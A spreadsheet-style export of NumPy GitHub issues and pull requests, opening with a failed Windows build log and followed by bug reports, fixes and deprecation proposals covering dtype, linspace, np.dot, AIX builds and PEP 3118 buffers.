C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\x86_amd64\link.exe /nologo /INCREMENTAL:NO /LTCG /MANIFEST:EMBED,ID=1 /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\um\x64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\um\x64" _configtest.obj /OUT:_configtest.exe_x000D_
success!_x000D_
removing: _configtest.c _configtest.obj _configtest.obj.d _configtest.exe_x000D_
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\x86_amd64\cl.exe /c /nologo /Ox /W3 /GL /DNDEBUG /MD -Inumpy\core\src\common -Inumpy\core\src -Inumpy\core -Inumpy\core\src\npymath -Inumpy\core\src\multiarray -Inumpy\core\src\umath -Inumpy\core\src\npysort -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" /Tc_configtest.c /Fo_configtest.obj_x000D_
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\x86_amd64\link.exe /nologo /INCREMENTAL:NO /LTCG /MANIFEST:EMBED,ID=1 /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\um\x64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.16299.0\um\x64" _configtest.obj /OUT:_configtest.exe_x000D_
success!_x000D_
removing: _configtest.c _configtest.obj _configtest.obj.d _configtest.exe_x000D_
creating build\src.win-amd64-3.5\numpy\core_x000D_
creating build\src.win-amd64-3.5\numpy\core\src_x000D_
creating build\src.win-amd64-3.5\numpy\core\src\npymath_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npymath\npy_math_internal.h_x000D_
  adding 'build\src.win-amd64-3.5\numpy\core\src\npymath' to include_dirs._x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npymath\ieee754.c_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npymath\npy_math_complex.c_x000D_
None - nothing done with h_files = ['build\\src.win-amd64-3.5\\numpy\\core\\src\\npymath\\npy_math_internal.h']_x000D_
building library "npysort" sources_x000D_
creating build\src.win-amd64-3.5\numpy\core\src\common_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\common\npy_sort.h_x000D_
  adding 'build\src.win-amd64-3.5\numpy\core\src\common' to include_dirs._x000D_
creating build\src.win-amd64-3.5\numpy\core\src\npysort_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npysort\quicksort.c_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npysort\mergesort.c_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npysort\heapsort.c_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\common\npy_partition.h_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npysort\selection.c_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\common\npy_binsearch.h_x000D_
conv_template:&gt; build\src.win-amd64-3.5\numpy\core\src\npysort\binsearch.c_x000D_
None - nothing done with h_files = ['build\\src.win-amd64-3.5\\numpy\\core\\src\\common\\npy_sort.h', 'build\\src.win-amd64-3.5\\numpy\\core\\src\\common\\npy_partition.h', 'build\\src.win-amd64-3.5\\numpy\\core\\src\\common\\npy_binsearch.h']_x000D_
building extension "numpy.core._dummy" sources_x000D_
Generating build\src.win-amd64-3.5\numpy\core\include/numpy\config.h_x000D_
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\x86_amd64\cl.exe /c /nologo /Ox /W3 /GL /DNDEBUG /MD -Inumpy\core\src\common -Inumpy\core\src -Inumpy\core -Inumpy\core\src\npymath -Inumpy\core\src\multiarray -Inumpy\core\src\umath -Inumpy\core\src\npysort -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" /Tc_configtest.c /Fo_configtest.obj_x000D_
b"_configtest.c\r\n_configtest.c(1): fatal error C1083: Cannot open include file: 'Python.h': No such file or directory\r\n"_x000D_
failure._x000D_
removing: _configtest.c _configtest.obj_x000D_
Running from numpy source directory._x000D_
numpy\core\setup.py:400: MismatchCAPIWarning: API mismatch detected, the C API version numbers have to be updated. Current C api version is 13, with checksum 5b0e8bbded00b166125974fc71e80a33, but recorded checksum for C API version 13 in codegen_dir/cversions.txt is a1bc756c5782853ec2e3616cf66869d8. If functions were added in the C API, you have to update C_API_VERSION  in numpy\core\setup_common.py._x000D_
  check_api_version(C_API_VERSION, codegen_dir)_x000D_
C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\system_info.py:625: UserWarning:_x000D_
    Atlas (http://math-atlas.sourceforge.net/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [atlas]) or by setting_x000D_
    the ATLAS environment variable._x000D_
  self.calc_info()_x000D_
C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\system_info.py:625: UserWarning:_x000D_
    Blas (http://www.netlib.org/blas/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
    the BLAS environment variable._x000D_
  self.calc_info()_x000D_
C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\system_info.py:625: UserWarning:_x000D_
    Blas (http://www.netlib.org/blas/) sources not found._x000D_
    Directories to search for the sources can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
    the BLAS_SRC environment variable._x000D_
  self.calc_info()_x000D_
C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\system_info.py:625: UserWarning:_x000D_
    Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
    Directories to search for the libraries can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
    the LAPACK environment variable._x000D_
  self.calc_info()_x000D_
C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\system_info.py:625: UserWarning:_x000D_
    Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
    Directories to search for the sources can be specified in the_x000D_
    numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
    the LAPACK_SRC environment variable._x000D_
  self.calc_info()_x000D_
C:\Program Files\Python 3.5\lib\distutils\dist.py:261: UserWarning: Unknown distribution option: 'define_macros'_x000D_
  warnings.warn(msg)_x000D_
Traceback (most recent call last):_x000D_
  File "setup.py", line 415, in &lt;module&gt;_x000D_
    setup_package()_x000D_
  File "setup.py", line 407, in setup_package_x000D_
    setup(**metadata)_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\core.py", line 171, in setup_x000D_
    return old_setup(**new_attr)_x000D_
  File "C:\Users\wiese\AppData\Roaming\Python\Python35\site-packages\setuptools\__init__.py", line 129, in setup_x000D_
    return distutils.core.setup(**attrs)_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\core.py", line 148, in setup_x000D_
    dist.run_commands()_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\dist.py", line 955, in run_commands_x000D_
    self.run_command(cmd)_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\dist.py", line 974, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\command\build.py", line 47, in run_x000D_
    old_build.run(self)_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\command\build.py", line 135, in run_x000D_
    self.run_command(cmd_name)_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\cmd.py", line 313, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "C:\Program Files\Python 3.5\lib\distutils\dist.py", line 974, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\command\build_src.py", line 148, in run_x000D_
    self.build_sources()_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\command\build_src.py", line 165, in build_sources_x000D_
    self.build_extension_sources(ext)_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\command\build_src.py", line 324, in build_extension_sources_x000D_
    sources = self.generate_sources(sources, ext)_x000D_
  File "C:\Users\wiese\Repos\numeric-python\numpy\numpy\distutils\command\build_src.py", line 377, in generate_sources_x000D_
    source = func(extension, build_dir)_x000D_
  File "numpy\core\setup.py", line 422, in generate_config_h_x000D_
    moredefs, ignored = cocache.check_types(config_cmd, ext, build_dir)_x000D_
  File "numpy\core\setup.py", line 47, in check_types_x000D_
    out = check_types(*a, **kw)_x000D_
  File "numpy\core\setup.py", line 281, in check_types_x000D_
    "install {0}-dev|{0}-devel.".format(python))_x000D_
SystemError: Cannot compile 'Python.h'. Perhaps you need to install python-dev|python-devel._x000D_
_x000D_
Build failed!_x000D_
```</t>
  </si>
  <si>
    <t>Building on windows no longer works</t>
  </si>
  <si>
    <t xml:space="preserve">Some cleanup after #12405 and #12342 </t>
  </si>
  <si>
    <t>MAINT: rename helper functions for consistency</t>
  </si>
  <si>
    <t>[ci-skip]_x000D_
_x000D_
See recent discussion in #8174, that updated docstring was not correct.</t>
  </si>
  <si>
    <t>MAINT: correct the dtype.descr docstring</t>
  </si>
  <si>
    <t>Fixes #10483_x000D_
_x000D_
The problem was the fill_value was not being updated correctly for multifield-views of masked-arrays. Also, `dtype.descr` was used incorrectly. This eliminates the last use of `.descr` in `np.ma`.</t>
  </si>
  <si>
    <t>BUG: multifield-view of MaskedArray gets bad fill_value</t>
  </si>
  <si>
    <t xml:space="preserve">If locale.getpreferredencoding(False) returns Null,_x000D_
the build fails, since commit 5652b0785._x000D_
This seems to be not really necessary; here we_x000D_
provide a fallback to 'ascii' locale if needed, and allow the build_x000D_
to proceed._x000D_
_x000D_
Closes #12403._x000D_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</si>
  <si>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Fall back to 'ascii' locale in build (if needed)</t>
  </si>
  <si>
    <t>This ought to be as simple as constructing a dtype with all the fields overlapping._x000D_
_x000D_
This will go in `_dtype_ctypes.py`, and there's a test that needs activating in `test_dtype.py`.</t>
  </si>
  <si>
    <t>ENH: Add support for `np.dtype(ctypes.Union)`</t>
  </si>
  <si>
    <t xml:space="preserve">We have yet another backward-compatible shim of defines to replace `npy_*` with `*`, for instance `npy_byte` with `byte`.  It was useful during a transition period long ago but should no longer be used since it could cause name conflicts. Will conflict with #12401_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DEP: Remove noprefix.h</t>
  </si>
  <si>
    <t>Add a release note for 1.17 so new PRs can modify it</t>
  </si>
  <si>
    <t>WIP, DOC: add skeleton release note for 1.17</t>
  </si>
  <si>
    <t xml:space="preserve">Change differentiate to integrate in parameter `p` description._x000D_
Fixes #12386._x000D_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</si>
  <si>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Fix typo in polyint. Fixes #12386.</t>
  </si>
  <si>
    <t>Fix the overlap check for vectors larger than 16 bytes. Only an issue_x000D_
when avx is enabled at compile time._x000D_
_x000D_
The actual fix is in the first few hunks, whether we want to use the macro in the rest of the code is debatable as it introduces a dependency between the macros being used and the code, unlikely be a practical issue though.</t>
  </si>
  <si>
    <t>BUG: fix possible overlap issues with avx enabled</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
### Reproducing code example_x000D_
_x000D_
```python_x000D_
# coding:utf-8_x000D_
import numpy as np_x000D_
_x000D_
_x000D_
def rand_matrix(m, n):_x000D_
    temp = np.random.randint(m, n, [3, 3])_x000D_
    return np.mat(temp)_x000D_
_x000D_
_x000D_
def inversion(m, n):_x000D_
    temp = rand_matrix(m, n)_x000D_
    print("random matrix is:\n ", temp)_x000D_
    try:_x000D_
        output = temp.I_x000D_
        print("random matrix's inversion is:\n", output)_x000D_
        print(np.dot(temp, output))_x000D_
        return output_x000D_
    except np.linalg.linalg.LinAlgError as err:_x000D_
        print("the matrix is singular matrix which inversion doesn't exist")_x000D_
_x000D_
_x000D_
inversion(1, 20)_x000D_
_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### result:_x000D_
_x000D_
![example](http://youngseaz.com/p.png)_x000D_
I run the code several times. The result of running the code was similar to the screenshot. The code produces a random 3*3 matrix named temp, then calculates the inverse of the random matrix. Finally, I called numpy.dot() for examination. But the result exceeding my expectations, the result wasn't  identity matrix_x000D_
_x000D_
### Numpy/Python version information: _x000D_
Python --version 3.6.3_x000D_
numpy --version 1.13.3_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>The matrix multiplied by its own inverse is not equal to the identity matrix</t>
  </si>
  <si>
    <t>We are building scipy in AIX OS with python3. _x000D_
We have both 32bit and 64bit version of python3 shipping with python3 rpm from IBM AIX Toolbox. And 64bit version is the default. _x000D_
In AIX, one has to always pass the gcc/g++/gfortran flag "-maix64" for 64bit build. If this option is not passed, the resulting object files will be 32bit. _x000D_
While building scipy, this flag "-maix64" is getting passed for c &amp; c++ code compilation (through the sysconfigdata file) but not for fortran code. And because of this 64bit compilation is failing. _x000D_
To fix that , i have to manually export FFLAGS="-maix64" and edit the below file to pass the flag for shared library creation._x000D_
```_x000D_
--- site-packages/numpy/distutils/fcompiler/gnu.py_orig 2018-11-13 04:24:10 +0000_x000D_
+++ site-packages/numpy/distutils/fcompiler/gnu.py      2018-11-13 05:13:46 +0000_x000D_
@@ -294,7 +294,7 @@_x000D_
                           "-fno-second-underscore"] + _EXTRAFLAGS,_x000D_
         'compiler_fix' : [None, "-Wall",  "-g","-ffixed-form",_x000D_
                           "-fno-second-underscore"] + _EXTRAFLAGS,_x000D_
-        'linker_so'    : ["&lt;F90&gt;", "-Wall", "-g"],_x000D_
+        'linker_so'    : ["&lt;F90&gt;", "-Wall", "-g", "-maix64"],_x000D_
         'archiver'     : ["ar", "-cr"],_x000D_
         'ranlib'       : ["ranlib"],_x000D_
         'linker_exe'   : [None, "-Wall"]_x000D_
```_x000D_
I think we can make numpy handle this situation by including this flag "-maix64" based whether it's 64bit or 32bit python in AIX (using something like  platform.architecture() which outputs ('64bit', 'COFF') in AIX)</t>
  </si>
  <si>
    <t>gfortran needs "-maix64" flag for 64bit python in AIX</t>
  </si>
  <si>
    <t xml:space="preserve">I am getting randomly corrupted results from `np.dot` if the first argument is an array of doubles with FORTRAN layout._x000D_
_x000D_
The behavior is non-deterministic and the does not occur unless I import a large module beforehand (e.g. `seaborn` or `theano` does the trick)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
random = dict(_x000D_
    int = lambda shape: np.random.randint(low=0, high=10, size=shape),_x000D_
    float = lambda shape: np.random.randn(*shape)_x000D_
)_x000D_
_x000D_
def check_dot(A, b, attempts=10, eps=1e-1):_x000D_
    expected = (A * b).sum(axis=1)_x000D_
    for i in range(attempts):_x000D_
        actual = np.dot(A, b)_x000D_
        if not np.allclose(expected, actual, eps):_x000D_
            return False_x000D_
    return True_x000D_
_x000D_
def test(n_cols=2):_x000D_
    for n_rows in 2**np.arange(1, 16, 1):_x000D_
        for type, f in random.items():_x000D_
            A = f((n_rows, n_cols))_x000D_
            b = f((n_cols,))_x000D_
            for order in 'CF':_x000D_
                Ac = np.copy(A, order=order)_x000D_
                if not check_dot(Ac, b):_x000D_
                    print(type, n_rows, order)_x000D_
                    return Ac, b_x000D_
    return None_x000D_
_x000D_
_x000D_
assert test() is None_x000D_
import seaborn # or import theano_x000D_
Ac, b = test()_x000D_
```_x000D_
prints_x000D_
```_x000D_
float 8192 F_x000D_
```_x000D_
The error reliably occurs for matrices of larger sizes._x000D_
_x000D_
### Examples of corrupted results (random data)_x000D_
_x000D_
If the failure occurs and I evaluate `np.dot(Ac, b)` a few times _x000D_
```_x000D_
import matplotlib.pyplot as plt_x000D_
_x000D_
n_eval = 4_x000D_
f, axes = plt.subplots(n_eval, 1, True, True, figsize=(8, 1.5*n_eval))_x000D_
_x000D_
expected = (Ac*b).sum(axis=1)_x000D_
for ax in axes:_x000D_
    actual  = np.dot(Ac, b)_x000D_
    ax.plot(actual - expected)_x000D_
_x000D_
```_x000D_
the output is non-deterministic and the errors look like this:_x000D_
![errors-randn](https://user-images.githubusercontent.com/592849/48546769-71326a00-e8c9-11e8-83f5-5e9bbf42e0f6.png)_x000D_
_x000D_
### Examples of corrupted results (structured data)_x000D_
_x000D_
If I replace the normal random generator with `linspace`:_x000D_
```python_x000D_
random = dict(_x000D_
    int = lambda shape: np.random.randint(low=0, high=10, size=shape),_x000D_
    float = lambda shape: np.linspace(0, 1, np.product(shape)).reshape(shape)_x000D_
)_x000D_
```_x000D_
I get errors plots looking like this:_x000D_
![errors-linspace](https://user-images.githubusercontent.com/592849/48548017-3251e380-e8cc-11e8-88b1-396335361056.png)_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Since I am using numpy packaged for [nix](www.nixos.com) package manager it is easy to get exactly the same Python environment package on a different machine. I did not do this yet._x000D_
_x000D_
```_x000D_
&gt;&gt; sys.version_x000D_
3.6.6 (default, Jun 27 2018, 05:47:41) _x000D_
[GCC 7.3.0]_x000D_
_x000D_
&gt;&gt; np.__version___x000D_
1.15.1_x000D_
_x000D_
&gt;&gt; np.show_config()_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/nix/store/blk28p4cr6r2nc7fi1c4gggiqpd7pkqy-openblas-0.3.1/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
blas_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/nix/store/blk28p4cr6r2nc7fi1c4gggiqpd7pkqy-openblas-0.3.1/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/nix/store/blk28p4cr6r2nc7fi1c4gggiqpd7pkqy-openblas-0.3.1/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/nix/store/blk28p4cr6r2nc7fi1c4gggiqpd7pkqy-openblas-0.3.1/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Non-deterministically corrupted results from np.dot (conditional on large imports)</t>
  </si>
  <si>
    <t>Fixes #12272_x000D_
_x000D_
---_x000D_
_x000D_
Note: This is pre-empting a patch to address #12273, which I'm hoping we can pull a new contributor in for. We should not merge it without waiting for that to happen, or removing the line about `Union`s from these release notes.</t>
  </si>
  <si>
    <t>DOC: Add release notes for ctypes improvements</t>
  </si>
  <si>
    <t>As [suggested](https://github.com/numpy/numpy/issues/11521#issuecomment-438886448) in #11521, calls to `numpy.lib.function_base.unique`, which was deprecated in 1.4, ~will now raise.~ was removed._x000D_
_x000D_
Edit: removed, not raising.</t>
  </si>
  <si>
    <t>DEP: raise on a call to deprecated numpy.lib.function_base.unique</t>
  </si>
  <si>
    <t xml:space="preserve">This code was added in 1.4, with the note "can be removed after the next release" </t>
  </si>
  <si>
    <t>DEV: remove shim added in 1.4</t>
  </si>
  <si>
    <t>As discussed on the mailing list, perhaps it would be good for `linspace` to allow `start` and `stop` to be arrays, which are broadcast against each other. For now, this is just a proof of concept - which presumes the final axis that is counted is the first one.  With it, two tests failed, which seem both false positives (in that the tests were not written very well, in one case with a note stating that)._x000D_
_x000D_
EDIT: TODO from mailing: add `axis` argument (probably with `0` as a default; should be axis in output, so `-1` is last). Could be simple transpose at end, or use reshaping of inputs._x000D_
_x000D_
Anyway, with this:_x000D_
```_x000D_
In [4]: np.linspace(np.array([1., 2.]), np.array([3., 4.]), 5)_x000D_
Out[4]: _x000D_
array([[1. , 2. ],_x000D_
       [1.5, 2.5],_x000D_
       [2. , 3. ],_x000D_
       [2.5, 3.5],_x000D_
       [3. , 4. ]])_x000D_
_x000D_
In [5]: np.linspace(np.array([1., 2.]), np.array([[3.], [4.]]), 5)_x000D_
Out[5]: _x000D_
array([[[1.  , 2.  ],_x000D_
        [1.  , 2.  ]],_x000D_
_x000D_
       [[1.5 , 2.25],_x000D_
        [1.75, 2.5 ]],_x000D_
_x000D_
       [[2.  , 2.5 ],_x000D_
        [2.5 , 3.  ]],_x000D_
_x000D_
       [[2.5 , 2.75],_x000D_
        [3.25, 3.5 ]],_x000D_
_x000D_
       [[3.  , 3.  ],_x000D_
        [4.  , 4.  ]]])_x000D_
```</t>
  </si>
  <si>
    <t>ENH: allow arrays for start and stop in {lin,log,geom}space</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Shouldn't the description of the parameter ```p``` in numpy.polyint be `Polynomial to integrate` instead of `Polynomial to differentiate`?_x000D_
</t>
  </si>
  <si>
    <t>DOC: polyint typo</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #12271_x000D_
_x000D_
Tests verify that everything in ``dir(numpy)`` either has ``__module__`` set to ``'numpy'``, or appears in an explicit whitelist of undocumented functions and exported bulitins. These should eventually be documented or removed._x000D_
_x000D_
I also identified a handful of functions for which I had accidentally not setup dispatch for with ``__array_function__`` before, mostly because they were listed under "ndarray methods" in ``_add_newdocs.py``. I guess that should be a lesson in trusting code comments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</si>
  <si>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set correct __module__ for objects in numpy's public API</t>
  </si>
  <si>
    <t>The [`__init__` method of DataSource](https://github.com/numpy/numpy/blob/master/numpy/lib/_datasource.py#L314) initializes instance attributes that are expected to exist during the cleanup performed by its `__del__` method._x000D_
_x000D_
While this sounds sensible, if `__init__` fails for any reason and `self._istmpdest` is an attribute that doesn't exist, an `AttributeError` can be raised when trying to clean up the object with `__del__`. This probably only happens if the original source of the `Exception` in `__init__` is caught, so that the final reference to the instance object can be removed via `__del__`._x000D_
_x000D_
The above scenario can be observed to happen in the [Azure CI for the refguide check PR](https://dev.azure.com/numpy/numpy/_build/results?buildId=826&amp;view=logs) in the macOS Job under "Run Refguide Check" slot._x000D_
_x000D_
Specifically, in #12253 the ported version of `refguide_check` has the function [`is_deprecated()`](https://github.com/numpy/numpy/pull/12253/files#diff-d5ff24498c294c9ac32f57f408e1d519R240), which calls `DataSource()` with an invalid keyword argument, preventing the `__init__` completion, and catching the `TypeError` with `except Exception`, which likely triggers `__del__` and produces the Traceback observed in the CI result._x000D_
_x000D_
This doesn't actually cause refguide_check to fail, but it would be nice to clean up that mess visible in the refguide check run report if possible.</t>
  </si>
  <si>
    <t>BUG: graceful DataSource __del__ when __init__ fails</t>
  </si>
  <si>
    <t xml:space="preserve">It seems that special casing the long double precision tests in order to_x000D_
deal with PPC is no longer needed now that finfo has been fixed for the_x000D_
IBM double double and the blacklisting of failing functions._x000D_
Consequently the tests can be simplified and no longer needed functions_x000D_
removed. See #8566 for discussion._x000D_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</si>
  <si>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Update complex long double precision tests.</t>
  </si>
  <si>
    <t>PR #11916 was the last step in implementing NEP 15 (merging umath and multiarray shared objects).</t>
  </si>
  <si>
    <t>NEP: move nep 15 from accepted to final</t>
  </si>
  <si>
    <t>Fixes #7419. Whatever failed must set an exception._x000D_
_x000D_
Maybe should have a test but how can we construct one?</t>
  </si>
  <si>
    <t>BUG: do not override exception on import failure</t>
  </si>
  <si>
    <t>Split off from PR #12358. Empty field names are confusing, users should construct record arrays with name, format, offset dictionaries instead.</t>
  </si>
  <si>
    <t>DEP: deprecate empty field names</t>
  </si>
  <si>
    <t>['07 - Deprecation', '25 - WIP', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">Relates to #12369_x000D_
_x000D_
Traceback is now:_x000D_
_x000D_
```_x000D_
In [1]: from array import array_x000D_
   ...: import numpy as np_x000D_
   ...:_x000D_
   ...: buf = array('u', ['q', 'w', 'e', 'r', 't'])_x000D_
   ...: view = memoryview(buf)_x000D_
   ...:_x000D_
_x000D_
In [2]: np.array(view)_x000D_
NotImplementedError: Unrepresentable PEP 3118 data type 'u' (UCS-2 strings)_x000D_
_x000D_
The above exception was the direct cause of the following exception:_x000D_
_x000D_
ValueError: 'u' is not a valid PEP 3118 buffer format string_x000D_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</si>
  <si>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Improve error message for legal but unsupported PEP3118 types</t>
  </si>
  <si>
    <t xml:space="preserve">Handling of the builtin `array`'s `"u"` type on Windows Python 3 fails. This problem does not exist on macOS or on Linux with Python 3. Happens on both 32-bit and 64-bit Windows with Python 3.5-3.7 (may effect earlier Python 3 versions as well). Does not effect Python 2 as the builtin `array` did not support the (new) buffer protocol._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
from array import array_x000D_
import numpy as np_x000D_
_x000D_
buf = array('u', [u'q', u'w', u'e', u'r', u't'])_x000D_
view = memoryview(buf)_x000D_
arr = np.array(view, copy=False)_x000D_
```_x000D_
_x000D_
Some [build failures from our test suite]( https://ci.appveyor.com/project/zarr-developers/numcodecs/builds/20224671 ) for more details._x000D_
_x000D_
### Error message:_x000D_
_x000D_
```python_x000D_
ValueError: 'u' is not a valid PEP 3118 buffer format string_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Windows 32-bit or 64-bit_x000D_
Python 3.7.0_x000D_
NumPy 1.15.4_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Coercing builtin unicode array to NumPy array fails on Windows</t>
  </si>
  <si>
    <t>This is part of adding timsort to numpy sorting algorithms #12186. _x000D_
